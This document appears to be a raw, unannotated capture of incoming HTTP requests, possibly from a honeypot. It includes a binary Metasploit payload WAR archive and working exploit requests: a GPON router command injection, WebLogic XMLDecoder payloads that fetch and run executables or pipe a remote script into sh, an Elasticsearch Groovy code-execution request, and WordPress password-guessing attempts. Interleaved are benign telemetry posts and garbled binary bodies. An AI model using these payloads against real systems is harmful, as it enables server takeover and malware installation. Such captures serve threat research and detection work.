Content-Type: application/octet-stream
Content-Length: 6570

PK!WtGULUÚµµZdMNkvdzeENFB3bKWorMSuJP.warPK!WtGWEB-INF/PK!WtG˚–xÚ•
WEB-INF/web.xmlùêKOÉ@Ö˜¸äqñFÊjŸ§±ì™ 	5M›43Qt^ô–˙Î%iSp€›πÁ>æ윧@=∑Æ’Íflêk<Oǯ"}YÆ∑eÜæyRcP˘∫x^-TùBy€ẌŒsÈÆ–J5 ]ßh√ktoåhÍáÉhF"Ĩ¿
˛fi‹|“û◊)“h	Ã38v≥]DÜ£5(«m/∏U®®‰…ÀãØû˝Ú¨xXDı”F€ºÍÀ˛çç[熌%í{Íå–≠'%›MYuËè{ᡇdLn»!R´fiœŒ“YÍ=∑*ÅÀ¶ıú`‡Ùá?PK!WtGWEB-INF/classes/PK!WtGWEB-INF/classes/metasploit/PK!WtGp{-flNA!(WEB-INF/classes/metasploit/Payload.classï	xÂıΩŸŸùŸ…‰`¬√°àäKNEå∏x4Ñ —\∞¡QqÿùêïÕN‹ôê†÷ZEmµ˜)V‘R4ˆ∞B¥õh‘z¥x‘≥≠Z≠÷≥¥÷÷Zµwïæ7≥K6…bi>¯œ˜ø˚ö}Ï£ªÔÄcÑÅΩ¸N
ÅÁflKñ~ÿ´¿©ñ¬€º˝£‚˘˛Ã7Ô2¯_∞·=fiÁÕ2¸UÜø)0˛Œ√?$¯'œˇí·fl<ˇááy¯H
ˆ—ëNP‡çOFQF?/
J(qÚVë±à¡Täe,ë±T∆2æü&£&cπå”e…8C¬ô
ã≥¯ôN+xO¡Ÿ8G¬π2Œ#∫xàåáÚ—|√<Ó˜OzZ¡#H¶±0{Ò =9J∆∞ÑãÇXÅï$;VIXÕõkÒh	èëq±å«2Æ%ß¿j¨ìÒxó xB#∏åáe<I¬ìôÈSd¸œı
t·r	8óıs.Æê±ëI¨îÒT	W)'ȺI¬”ÿH¬”H`≥Ñ-
l¬V⁄h 9Èx
Ì2ÆñqçÑQ	;$\+·2v x¶å]
l∆≥xX«√ŸlàΩ2û√ä9W∆ıdO<èıgH∏AÅÀ1&a\Å+òÆ©¿UÏW`∑Ñ%Ïë1!·˘
\Éõ∏ìflÀCä—Y<Ù…x
ãìñ—ñ–ë∞_¬Õ
l√
Æ≈AVÓ.îÒ"ÜøX∆OÚ|âåü‚˘R6∆ß%ºLÅõô∂àó”
∑ȯ
ñ‡JØbM~F∆œÚÕ’<\#·Áÿ{ÏÛ¥¬/Òyı%æxáü|ôáØUrl¸ØæŒ√7x¯¶å◊*ÅÇ∏
Ø„ìo1£◊À∏ùÁdºQ∆õd¸∂Ñ;§∂Ë˙÷˙ñF≠˘|c≥Qõ4Rk£N:ë⁄∏庺Ωæc’˙hc;B†)∫ææÈL<À€¨hã"O´?£~˝™6∆81ëJ8'#¯¬ãŒ@¨∏ISØëH!ÃØõJÄ¡î∆¡òŸÁ$¨îç0m ùpÃ∆fi
f<n∆W&íÑ`I8ÔaC“∞ÌeS1y'	´ñfl^	ø#·N‚oÉe9∂ì6˙¢·˝PM©æ~áûöFÔ¯”∂~gÚi>â_∂—tNKõçÉf¨fl160«√@©W5‚Ò∆A«LŸ$>1€ùH≈õR+ÈIRO≤÷ú‹Ñ"e•{çd‚BbcA¯ HÒÑmõ1·®B‡Î
z≈ⱧkjûÜg¶ª0˝N"Y€û∂˙Ã¥ì0…òZØÈv_“J8µÌ∆ñ§eƒfN∆∑º?ëåõio∆[T¬[U¸.~躩&∆∂VÒ˚xBiÌ8≤ö∏·®¯ºM≈‚Ì*Óbîq®∏^&óÿ}∆©U¨qz˚TÜWUºÔ$µÁÎ@≈1
±&ûHì<òQqÔ‰’®
œ¡Û*fiÖwìgÆ …˙Ãx>ô1ʯº¡ıH·—DÔì«*fi讯 >§‚Oß%ìÿÉ´¯Û„[ª¶
à«È≥#*>äè!1UÈ~€i1R∆F3ÌÈAˇòª¢˙∆h;≠¨4È˛ê<Ñt—òä•∑∏ëó//x:+_]˘A¬J˙ôäè„>©‚S¯4Ö√d˚íj˘HÖóÿ(Jµã¥œpzT|.·/T¸%>´‚s¯¨Ñ§Ì_·*朮$<ÅPlõN~lïN ˛Z≈óeÉØL fl∂·|Úk_≈◊$|]≈7MÑC«Ô[≠h¨ß≈tz¨¯˛D¶åıÙZ§,°rP≈fl‚^“ ¯õ˝p*˛éΩŒfl‹fi∂¶ÉD\Bº]’• ı{fl¬?®¯6˛ëÓ“∆@anNãÀ∑8f}:ml…KB*˛	"Ì4E€™ó.=ÓÑÍcT|ˇÃ
~7ÁØ)”©%GQÒ/¯fi[÷pfl«»°˙ms•EÈdF>ä+ï"’∏b¸üEò7Ö∑|3ÁîŒØ£VlìÈ0_CçõÈÕfz¸ÚÔ*˛ˇ©‚øfl‰?y¨Np0Úœ
 Ã;ßËâÈ9ó]&ÂgŒOMû≠)5È„©»søkìô¢tH:( Íi~uı|í)Íê¢⁄ç¥AÏôi"èÛôıˇ®¯!ÓUÒ#Œ
≈πR‰´"¸ö‡jU‹'Ä*† ‰±∑¬på|ìÆ€sQÜÌß ∂•∂›L˜R¬ı™›úâwı…‰¯µ*¯ëÃ<Èy⁄r<À≠∞º∫:k"◊‹®’üéQ®»›Øë⁄⁄⁄)hbî¢k8Ow'bÜCÇ=-¯y®ÇD¬2æ´
AAQÖ"A•LŒœ˚<Ì’ÿ¨äU(J»„ióv&Yc°»ãúéû¥5‡Ö~3∑ÿ∏∂ÑR
*°LÖ«·	û ÄæZªGÖW‡Uä¢⁄
âî
ø·$"÷òɃÛk∫*L„Zöou#∂IÖ7‡MU–nU(á«Ta:C!1fPh◊–j&À9ãeò1µ$uwS	∫0õäë0GÊ
Ûxuà**Ãß`SÖ¬·|vÑ*…®
GÒmòJ™e◊§»´$aë*Tï™P%T´(KT¬ôØ∆6˚»Ôã
Œœ\9çƒ Ò«ıõy©È±zÕ\xçß∫f“>˚Òº¸|‹j9+≠˛T~£∂ºSâ˙îVÉÒNlF§¥Ÿó4ÿqfÑ
Ç*Å)Jé’’·dK;wéï´ƒ«”v}¥fiŒEÛ¢èÌUÚ€52ø◊IÃ*‹ŒqOÊè%-õ)"ZŸédÈ>FéŸaˆˆyùe n&)ˆ›Üïö⁄RÇÆfl`[…~áÚÇ”CÓ˘¸Ωõ‚‹§ûÿNܧÕ^kÛ‰æ0õ≤ b‹S6)+E—ôÙXÒëÑK`8HúKˇüÜr¢Ÿßçü5•s#;°Llõ¥=Äñö»°6…~≥≠õ!ö
".≤ÛÌÛˇs∏_∏b6¥ë6SégŸ≤îF7‡⁄å≤Æ‚¶,ª3q@ì/LO˛¢psùï&‰ï·É˝d‡Wy [”ürÅ
«@nöéŸcvsJr1Ñp¡ߺ#R`çè¢	§≤á‰ÙDjB9ù>P\1hc:m•s†e“∑…AÁ∑ì¶IflRb¯4Nı"®-’8òp&0∞‹≤í¶¡›wGW;}NõÚG…éz˝¬'¬ˇ≈ÂΩ…ó;mv'…˙µVX«öµD©ºy
Àru≤¿CÚåDj3u	'àÆu^“Äëp‹Vãí	9iüW‹®u§›¨öflo±ì,p¿>ã#~¸6ØZ≤ÓÏ˛
v6• §GÓ‹lN›Ö>‚ñì·¬Îñ≥≈J(⁄R„
 ¬Ïú?LiY™n+Ìç#ˇG∆œŸTa¸9*ƒMì˚€@ÿùFåΟ,ü	Øç\Ê%‰âMfl¨<Áù{Ö?_GdQå
¶„6Ü61õÉfiÜ[uœ…YWdCø˚kiňM.√>˙`ßú%U†´s	,O–hŒáÿ~πèÍ'#oÂñê\ÉïLfç≈8$ÊflÕ…A^≠ÏO&)Ø≈ÕÓD læÊö
â◊¸ÒùfAc´i*‰…Õ9‘”߲R„Í;e4•(ζbS∫èÒ∆˝Iï‰U˙¸ p=»Lÿ—˚˙Ìã\kEE°«∞[(cÁ,0/Ë7툧§üjJ˙¢Ì˛n‚Î≥˙‹œ,¶ÜÉ∞a5Ï·ÜB]wãíî{©’;S*fi~1´˛G0	•îH≈ÕA.°1MQM(•é≈|∫oΩhÒ;∑0øπÆ,ê4Sπ
b¸‘Ò®4p4π‘ ∆˚ÍfãZéÖ∆÷Sõõ¢´ˆˇ`òwα—l
òÈ√ŒkxÚa
páÅèÄfsõL´Ÿ‹ª3}
∏ÛìŸ˘)˜\
‰flûh¸9̶—å¸æbp∑˚˚w~
øÅØ≈- œ°k|Õ ∂åÅü÷Å™He5eµê3‘2P‘Z•©(éà∫∏J*u1%<îVjeòÒβ=pû¶i£0=–ué¡åÆ,V>ò…¯fy¯F@èH∫îÅŸ.î.È˛òë´tø.è¬\̺ŒJÌùÿ84Ûi}ò∂ áè¬u
∫`≤R(pûK7°ÄÖ#3∞∞3«ÑÃ/'2!Oe"ËíjG1y≈€TÛ∫H/ @8ã:´™ı"ó•
≠íËk§°Ím0≥J´q¡L´•'.×H {¯ˆòÒ€≈fiÌ€•+#∞$¢VÍ*#;N'≠÷ç¬Ò“Ω∞¥Àßù0
ëhó®-ãv˘ubqf¥À5H4'Fäı‚úD:Á˘döß√)£POOgt˘Ù"zÁR„ß
Ω”É—HâØÆ4T™ó‹∑éÛ’ïÖ  îp§^*]L∫ŸÅ!òô›-ü
ÑmkÌ{qk)çè	'Γ∏⁄≥kKÜ∆Î`u9ÖV䘬©]æaXEÃ5È2mO„ÌÈ¥mÓÇë …‰je°⁄ò3Wî¥Ñ	≤åkLt¡ºÀNóÜÊYè«0/Üp∏RãjYê+µµ¨ÈHêÂ.î꺠ܷåH—0tF‘!x@Wˆ¿e∫¢ùÈlˆtë˙…ÁŒ“÷e‡Ï8'R4k	¿≥ËIcpÆküı8/R¨£∞AãybñCú≈DOJΩÿíÌ`2éiy/ª#Ec∞ë‹≠áy8IÓÅÚ1Hê[Ö‰8?R<ƒúlÍ‚]2R¢ód†óLKSäÒY‰x4ıëãxæƒffl⁄ÃM:êÂ∆&ÖñÉC-á•.g
è3◊
T÷¥À„˝–OˇòåoÒ˝`ÚëNDÉÕπ∏–(*µA◊ΩΩ––∂å¿Öwëm"•Æ˜Ë•‰HÂz)≠Ë‚‚®Î,oèÅHX>©ȃÛ%Ã≥^:ü⁄
Çpº–%ú
-4_$\´)
=KˇE M´)c=œ{		÷“ôDsSEé•Kô%è ;≠:U9‚¥2∏G鯴u>›UnÑ2]‘˝æ•òÀ܈Ω≈i©ŒÀyL,@$~/Ä∆øUe…ΩOƒäh~e.Ô™Å≠ˇ\At؉§4W—Ú3¯Ï\M:∫¶ãÕ´}éÃΪ>?_‡`¯bDÆ~N`6æTâ)ÖíÂÀ/WT†Æ¯BAvfiØtEàØØÓ€æÔ˘!òììÚk$aµ'%ô◊Àõ_ß∞hfl»Y˙Ú<K”
µ`÷‘~∫©bKãŸê”8
è¡6÷‘u¯÷n∑<N‚⁄Iö	^ŒVä≥H%Õ≠ÿ<◊oÉyY÷Üa;g <Ê*F·∆Ê á'flfiîªd2ÿÃ]¥˚ˆ.W˝
ˇ:ï•SITòõC≥*Ë)˙6êµC‡◊≤∂Œ=|^Õ>\LLã4/$ºfli¡Vä’ù€@ÁúTUI§(µ∂í
w^~l≠ŒΩ
^œæøã^hæmn&¬∑4û°ñ *º[;9
™ƒ≈√]Úw∆ÛΩm–@”≈Q˚>{“8IÓ{Kª-ªôKå˛–øTfÄ™´æãnÁlÊ≈[;ማ3ªà“ÓàË´ÛḸ`Úã;A’≈aŒ¿ù∫X"ü∏3?Í‹Íß0z¡Õ≤Ñ"√H≥bº
ozb`êƒêÈÏCzbEYÌ™œegÛx:∂TîE20rÚº‡JWß󌜴+|!B7⁄B™æã<WfiÉÙÍn“uãÓâKÊ‹JHœ##у:1«{Ä6Rà 2E|ò%,·Ö_2ÁFZ‹Sñe´D¸?«æõ9}VΩ1íıî
¢~Ω™´òCífiKÕaBÓ2$˙wB)s»£C V¥Tocîù	G1§Öflüu∫fl-
‰ÁbE‘Sãø›flË‘ªŒpúvfl(¸xÓœ¿w¿É⁄C¥ª~¢˝t$ª›
◊”nèªl‘vo∑{I˛PK!WtGÊ˛vå 
,/WEB-INF/classes/metasploit/PayloadServlet.classçR]OA=Cg;∞¨ã|TA∑|∏Ä>Q√ã1@≤Q“
Òi†ì≤fŸ≠ªSÇøàg^@!¸Q∆;µÖj`ìΩ7sÔπÁûπw~˝>ø∞ÇW6å
åı¢`„1∆ûÙcìOmL3m„fûÃ
Ã1dflQ†◊2nÒWíFƒ`U„
• ÆˇU #/U…a®¥∑Øu›€$S˘(´o
ïÍ“ù∞¥G©*ôNˆª£=U◊
^∏êc4^(£öW—I’Hw—¡<Ün≤◊ıãñÚü⁄è˚âíU√È9XFN`≈¡™iP8PZ¶ı0¥∑-øᱨ∂Ù1Lfi~
ܸMár#ä‰n®∫™Z‡k}m’AÏm}Ëàʪ֖d@π˜ãˇˇ öcõªflà˙jJN≠ÜQ∑Ë∑%lU+Q2ø˚FÕFV™e¢;¥wRv/åSÖiÙ”£cx@/0Cû6HvêN…”Ê`ÕüÅù¿|åÇÌÙ,8zå_¢g'ìœT~ÄÉ˚'Õ*áÄyé<ÜhJ^SõZ¸â,√˚à"Ô]„~äæcXk|È∂aA°â~DñÜ)Ç?PK!WtGÙh¶,WEB-INF/classes/metasploit.datSpawn=2
LPORT=6415
PK
!WtGWEB-INF/PK
!WtG˚–xÚ•
&WEB-INF/web.xmlPK
!WtGE
WEB-INF/classes/PK
!WtGs
WEB-INF/classes/metasploit/PK
!WtGp{-flNA!(¨
WEB-INF/classes/metasploit/Payload.classPK
!WtGÊ˛vå 
,/@WEB-INF/classes/metasploit/PayloadServlet.classPK
!WtGÙh¶,WWEB-INF/classes/metasploit.datPK˘
¶PK!WtG6#dflflMETA-INF/application.xml<?xml version="1.0" encoding="UTF-8"?><application><display-name>b8KtA0j0m</display-name><module><web><web-uri>ZdMNkvdzeENFB3bKWorMSuJP.war</web-uri><context-root>/IApVNtBB0e0VsH3</context-root></web></module></application>PK
!WtGULUÚµµZdMNkvdzeENFB3bKWorMSuJP.warPK
!WtG6#dflflÔMETA-INF/application.xmlPKê

POST http://45.33.125.170/cgi/test HTTP/1.1
Host: x.x.x.x
Content-Length: 32
Accept-Encoding: gzip, deflate, compress
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36

524cd51857b155c854b30023159f86b6

POST http://check.proxyradar.com/azenv.php?auth=149415121023&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST http://185.17.73.141:6666/ HTTP/1.0
Content-length: 24
Connection: close

ho:128.199.140.88:8080


POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.idc3389.top/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149486678335&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 369

n=174224137064716&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgOMTE0LjEyMS4yMzkuNDMcGAblm73lpJYYBuWNsOWwvBgAGAAAGhwYE2FwcC5jaGF0LnhpYW9taS5uZXQZHBgNNTQuMjU1LjE4NC4xNhUAFQIWwgMVABsAAAAYD2NvbS54aWFvbWkueG1zZhgPY29tLnhpYW9taS54bXNmGBY0LjQuNC1WNy4wLjUuMC5LWERNSUNJAAA%3D&t=1495539066516&s=030CC54956FE65B6A1331022AE7C7597

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
t(ÛÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
®}fi›Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchuepwd

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
:µÃ©Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 29
Cache-Control: no-cache

log=admin&pwd=jamesatchuezxcv

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496058874463
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2709

1.056aae48ee0f55ad48a00142f@e77f4dd0e2fdae30dbe89ae5dab79eeb8847698ae95046185f6dbee004792959BÙ؇íËÜ
æxúÕXmo‚H˛+üÓnsŸvø¯i?åΩ0Èf`N˚rB∆v∞ç_^x4ˇ˝ $3√lf≥wÌ
EH°›T=]ıT=’˛‘öW—±’˛‘⁄m‚u?∆y´›"≠ÎVº|lµˇı©•0÷≈Vi]€†îhZ∑ã±’Î(¶™Z¨€=mJ#¯ïqØåf’6…ıYY≠ã C≥]±*·Ï´‚&J‚u\ÜÒ6.£xΩO“m|≥Y¶ÎÌMµ^‹ÑUXmpt∏	W´sµ2√m˙ònè`iªiµj®àÈ´
¡◊?ˆŸnµ>_?É
¢Iµü≠™M∫M´rÜgQú«ôÇ–LaËœ√ß1ç\ˇ°˚s®U9é7€`Ω>∆Î?
¡È◊øqv£	ÈáÊ…_ìHÇ©™]ˇû◊fl˚´¯E˘
΢ECTπ@~Q§Í:Ω~Q§ä.è_ÎM^,øÄ∆%Úã2E%ƒ/ òqy¸bEπ\~1F4ııë1
QÌr¯x2.é_*UÉ].øTJ0£»/ïÍ™ä.á_*5îK‰óNâz¡˝K’ôn®ó»/CaözA¸20" ≈ÒKc+‰r˘•Å>"vŸ“T§)4flk™Çı◊Ôèˇ˛¸ÔÎ÷‚~ùÒÙ2‰˙Ùbdv˛f$⁄µ⁄–¡ø,)3E°/.µƒvAÄ∂;XF_ÉÛGF£›:h›j´Ü—\@_ÒB&çî|ÒÚOÂøvsnïΩ∏0aø
;°TS^˜Bçê7cW_„ä˛6Ï
Ç	u7‡üª˘?¡k/&=ä—€¿ÎÑ!ÌU/*E÷fiå]1E ™æï4ò–◊ΩËnÕo∆nºPL£5fiÇù
’_ı¢1Â4gΩ
;F/ª~c£Ql ˝U7∫F¢|öÍÁÎVQ”˛?µÇ4裟:˛∏]ÿú|ao6≥Õnæ=Æö∂ˇÎá˜ÊO`:X≠ñÒò1’„=0DTR(~x⁄3iŸú0∂NTX«õ*flmüW`∞¯áÇÙÍÛæYXE‡¶)Õ(~L√xV¿Bs&fiø¢∑nØ9UZƒuU¬6ÌÎÆ/¢î·∫Ç=Eÿ?jÎj;T€Üfi~ m=Çi±ZßÂ∂πÉ√;§sÙÔ∆´π7ëñ€CCWÓÖª†‹Ì∏ez;˛∏€˜WwN7I$ÓÔE÷√¬dK&ºA1t˘Q÷yz_
∑≥Ù≥∫}<¥BÍ;˝#w∆âiÊ{yó?Ãù)ˆΩΩÏXˆ<˜Ó^®†'”ô_LflÈaÓıkÓ»˙æZ"ı≠>~2ÙFûÖ§1œ≥	ı›…¡∑¶©Ÿ´y)êÙõ;lÔC€¿˛›†<cÁò˝√∞º+Öv{_¶”Pæ≥BE∫”•®£é∆d6HÑ√©pG⁄&·E¨K¬Ωi¬;É„ô›flXæ/œmø∞úıô∞&5/F‘œÄô9d"	xR‡xËı©Ù§iëA~_ÜéqålN2Œ√“OÊùExÈ™éè4á¯,àzäoÖRÄ•∞†ã3fl≤¡+X´GL÷SHɃΩÉ_@Ú≤fifi4« ‹ÀóN◊d‹ sflÇı"\à•ÙD&›	íÓRÅ‘•2É¥π·QæùÎæ<?ôoA‹%Ü‘fl2è¢ôÔçéCgö…¬. ¶ÓrôıÃ.È$ÒÙ˚l@N;Ûü∂ÎÛ4áò9¢=)]yãxËÙà(¯^x#*`}h-®®âyÛŸCfiΰñÀìe`»úLèO§ÈˆÄL∑gdÚû…‰.˜¶Êuî¯Yí	KRëıë_¯©∞z{flÍÓFâtEr_ö¶qF&QIèÌN|ù(p¶Gª˙íÕn0=,*QOJ˘–íH‘Ω}nŸôÙ&˚˚QpH|éCkâ|7Oƒ»tB«f@U‰ò’ë[=rÎö ≠€gˆ„oªwçuâßπ_宵¸ñ›óæ5ŒáÑ8ÎÔπ~΂Vˇ¿ãâ"Ò6°|oO÷…¥Ü∞≠7®Ù]≠ÅπØ’6Ÿ+_äå3Å!P^üI7œ!÷¿QÏ÷“µ≥”9œ8âú)
<¯Ît¯˘Qhjkòç0„ıèÉ∆±$z…ltŸ‚»3;
.¿MàÉú◊Kˇ3fl4flÕâxàäÈ1ƒ˘„<Yÿ¢K—m6˙qÖ‘f-//˙¿YO¿ÙÇ{ê$j∫êÓÜQˆRÕ…∆é99‹∫|ÀøS—n:PARË=T]eC˜höe·'@®B‘ù\#”∫‰œΩü„√Jí%§@æ¿⁄$µA€#PÎG?Å·=»¬⁄+`´ÅN5á⁄Çæa
